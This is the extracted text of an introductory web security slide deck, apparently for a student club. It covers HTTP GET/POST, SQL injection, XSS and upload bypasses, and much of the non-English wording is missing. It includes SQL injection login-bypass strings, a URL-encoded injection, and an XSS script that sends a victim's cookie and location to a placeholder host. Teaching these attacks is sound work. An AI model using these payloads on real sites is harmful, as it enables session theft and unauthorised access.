Web Sec Introjyny @ NCHUIT

( )

Web Sec ( XD)

:)hello world :)

About• jyny

•

•

•

•

•

•

• TDOH

• jyny.tw

• about.me/jyny

• HTTP Method

• SQL Injection

• XSS

•

HTTP Method( )

HTTP Method• GET

• POST

• etc.

HTTP Method• GET

• HTTP Request

• Enter

HTTP Method• POST

•

• " "," "

m(_ _)m

what??

?=

GET POST• key value

• url.com?key=value

• &

• % Url encode

HTTP Method•

• or

• g0t.pw/http.php

SQL Injection

SQL Injection• SQL

• SQL

• OWASP Top 10

•

SQL Injection• GET POST DB

• server

• Server SQL

....

SQL Injection• PHP query

SQL Injection•

• username = jyny

• password = pwd

SQL Injection• SQL query

Orz

But

SQL Injection•

• username = 1' OR uid='1'/*

• password = */ OR password='

SQL Injection• SQL query

SQL Injection• SQL query

• query

....

SQL Injection

SQL Injection•

• user=%27%20or%20%27%27%20%3D%20%27%27%20--&pass=aaaaaaa

• URL encoding

• %27 %20 %3d

SQL Injection•

SQL Injection•

•

XD

SQL Injection•

•

SQL Injection• SQL

•

•

SQL Injection• SQL Injection

• sqlmap

XSS

XSS• Cross-site scripting

•

• OWASP Top 10

XSS•

<script>...</script>

•

• WOW!

XSS• Server

•

•

XSS•

• XD

XSS•

• g0t.pw/xhttp.php?%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E

• Orz

•

XSS•

•

• <script> document.write('<img src="http://url?cookie=' + document.cookie + '&location=' + document.location + '" />'); </script>

XSS• ?

• request

• cookie

• Cookie

Cookie

XSS• Cookie

• Session

•

upload•

• %00

•

•

• code injection

• comment injection

•

•

Orz

•

•

•

Reference• http://www.slideshare.net/chivincent/sql-injection-

in-ttu

• https://gist.github.com/Inndy/654aaf98cb260b75b8f3

• https://github.com/Jyny/pasc2at

• https://securityreactions.tumblr.com/

THX